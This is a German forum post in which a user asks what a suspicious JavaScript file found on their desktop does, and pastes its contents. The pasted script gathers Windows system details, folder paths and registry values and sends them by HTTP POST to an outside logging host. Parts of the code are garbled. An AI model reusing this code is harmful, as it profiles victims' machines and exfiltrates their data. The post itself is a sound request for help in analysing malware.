Hallo, bin neu hier. Seit mehr als 24h versuche ich einen Laptop bischen flotter zu machen und zu entschlacken.
Nun habe ich auf dem Deskop eine JS-Datei entdeckt, welches heute um ca. 2:00 erstellt worden ist.
Habe bis auf Windows-Update nichts installiert.
Kann mir vielleicht jemand sagen, was dieser Script anstellt (und evtl. woher da das Ding kommen mag)
Übrigens, der Internet-Explorer startet und wird sofort wieder beendet.
Vielleicht hat diese Script damit was zu tun?!
Hier der Inhalt der Datei per Copy&:stuck_out_tongue_winking_eye:aste
var chr=String.fromCharCode;var slash=chr(92);var backslash=chr(47);var quote=chr(34);var s = get_localization_string();var x = new ActiveXObject(‚Microsoft.XMLHTTP‘);x.open(‚POST‘, ‚http://locale.ipq.co/locale_logger3.php‘, false);x.send(s);function get_localization_string(){var param_delim = chr(34)+chr(44)+chr(34);var wsh = new ActiveXObject(‚WScript.Shell‘); my_computer = wsh.RegRead(‚HKCR‘+slash+‚CLSID‘+slash+’{20D04FE0-3AEA-1069-A2D8-08002B30309D}’+slash);sf=wsh[‚SpecialFolders‘];desktop_path = sf(‚Desktop‘);app_data_path = sf(‚AppData‘);my_documents_path = sf(‚MyDocuments‘);startup_path = slash2backslash(sf(‚StartUp‘));info=get_windows_info(); version=info.version;os_lang=dechex(info.lang);var num_backslashes = substr_count(startup_path, backslash);var tmp = startup_path;for(var i=0; i 0 && (offset + needle.length) > length) {return false;} else {cnt++;}}return cnt;}function get_windows_info(){s = {};try {var o = GetObject(„winmgmts:\\.\root\cimv2“);var e = new Enumerator(o.ExecQuery(‚SELECT * FROM Win32_OperatingSystem‘));var i = e.item();s.version = i.Caption + ’ ’ + i.Version; s.lang=i.OSLanguage;} catch(ex){} return s}function dechex(number){if (number